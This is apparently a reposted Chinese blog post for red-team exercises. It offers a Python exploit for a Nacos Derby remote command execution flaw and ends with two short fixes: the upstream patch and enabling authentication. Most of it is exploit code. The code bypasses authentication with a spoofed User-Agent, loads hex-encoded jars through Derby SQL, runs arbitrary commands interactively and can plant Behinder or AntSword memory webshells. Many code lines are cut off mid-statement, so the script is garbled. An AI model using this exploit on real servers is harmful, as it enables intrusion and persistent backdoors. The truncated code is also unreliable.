【攻防演练】【HW】【含poc】【含修复建议】Nacos Derby 远程命令执行漏洞
Nacos Derby命令执行漏洞利用脚本,默认使用User-Agent绕过漏洞进行利用https://github.com/Wileysec/nacos_derby_rce
https://github.com/Wileysec/nacos_derby_rce
[以下poc有些问题,推荐去github直接下载]
import sys
import requests
from urllib.parse import urljoin import random
import argparse
class NacosRCE:
def __init__(self,target,token=''):
self.removal_url = urljoin(target,'/nacos/v1/cs/ops/data/removal')
self.derby_url = urljoin(target,'/nacos/v1/cs/ops/derby')
self.console_state_url = urljoin(target,'/nacos/v1/console/server/st self.access_token = token
self.headers = {
"User-Agent": "Nacos-Server"
}
if self.access_token != '':
self.headers['Accesstoken'] = self.access_token
def getRandomId(self):
return ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKL
def check_vul(self):
req = requests.get(url=self.derby_url,headers=self.headers)
if "caused: Required request parameter" in req.text and req.status_c return True
else:
return False
def get_console_info(self):
req = requests.get(url=self.console_state_url)
data_json = req.json()
if req.status_code == 200:
if 'startup_mode' not in data_json.keys():
data_json['startup_mode'] = data_json.get("standalone_mode") return [data_json.get("version"),data_json.get("auth_enabled"),d
def base_info(self):
data = self.get_console_info()
print("[*] Nacos Version: " + data[0] + ", Authentication Required:
def javahex_exploit(self,option):
for i in range(0,sys.maxsize):
self.id = self.getRandomId() self.option = option
self.jar_filename="tmp/tmp"+self.id+".jar"
self.external_name = self.getExternalName(self.option) javahex = self.getJavaHex(self.option)
post_sql = """
CALL SYSCS_UTIL.SYSCS_EXPORT_QUERY_LOBS_TO_EXTFILE('values cast(
CALL sqlj.install_jar('{a4}', 'NACOS.{a5}', 0)
CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.clas CREATE FUNCTION S_EXAMPLE_{a7}(PARAM VARCHAR(2000)) RETURNS VARC
data = {'file':post_sql}
req = requests.post(url=self.removal_url,files=data,headers=self data_json = req.json()
if data_json.get('message',None) is None and data_json.get('data print("[+] Execution successful, Vulnerability exists! Funct break
if self.option not in ('1','2'):
while True:
cmd = input("Please enter the command you wish to execute (t if cmd == 'exit':
sys.exit(1)
self.execute_cmd(cmd)
else:
self.execute_cmd("whoami")
def execute_cmd(self,command):
get_sql = """select * from (select count(*) as b, S_EXAMPLE_{id}('{c
req = requests.get(url=self.derby_url + "?sql=" + get_sql,headers=se data_json = req.json()
if req.status_code == 200:
print("[+] Execution result: " + data_json.get("data")[0]['A'])
else:
print("[-] Execution error!")
def getExternalName(self,option):
if option == '1':
# 冰蝎内存马
return "org.apachegv.SignatureUtils.exec"
elif option == '2':
# AntSword内存马
return "TomcatMemoryShell.ConfigurationUtil.exec" else:
return "test.poc.Example.exec"
def getJavaHex(self,option):
if option == '1':
# 冰蝎内存马
return"504b03041400080808004160f2580000000000000000000000001400"
elif option == '2': # AntSword内存马
return "504b0304140008080800a3adf0580000000000000000000000001400
else:
# cmd
return "504b0304140008080800f888ec580000000000000000000000001400
def main(self):
self.base_info()
if self.check_vul() == False:
print("[-] The interface does not allow unauthorized access or t sys.exit(1)
while True:
option = input("Please enter the number of the operation you wis self.javahex_exploit(option)
break
if __name__ == '__main__':
print("""
_ _ _____ _ | \ | | | __ \ | | | \| | __ _ ___ ___ ___ | | | | ___ _ __| |__ _ _ | . ` |/ _` |/ __/ _ \/ __| | | | |/ _ \ '__| '_ \| | | | | |\ | (_| | (_| (_) \__ \ | |__| | __/ | | |_) | |_| | |_| \_|\__,_|\___\___/|___/ |_____/ \___|_| |_.__/ \__, | __/ | |___/
1.目前官方已经在最新代码中通过默认禁用 Derby 接口的方式对本漏洞进行了修复，修复提交如下：
https://github.com/alibaba/nacos/commit/ed7bd03d4c214d68f51654fee3eea7ecf72fd9ab
2.开启 Nacos Derby 数据库接口鉴权，具体操作请参考：
https://nacos.io/zh-cn/docs/v2/guide/user/auth.html
原文地址:https://blog.csdn.net/zzxx191z/article/details/140687614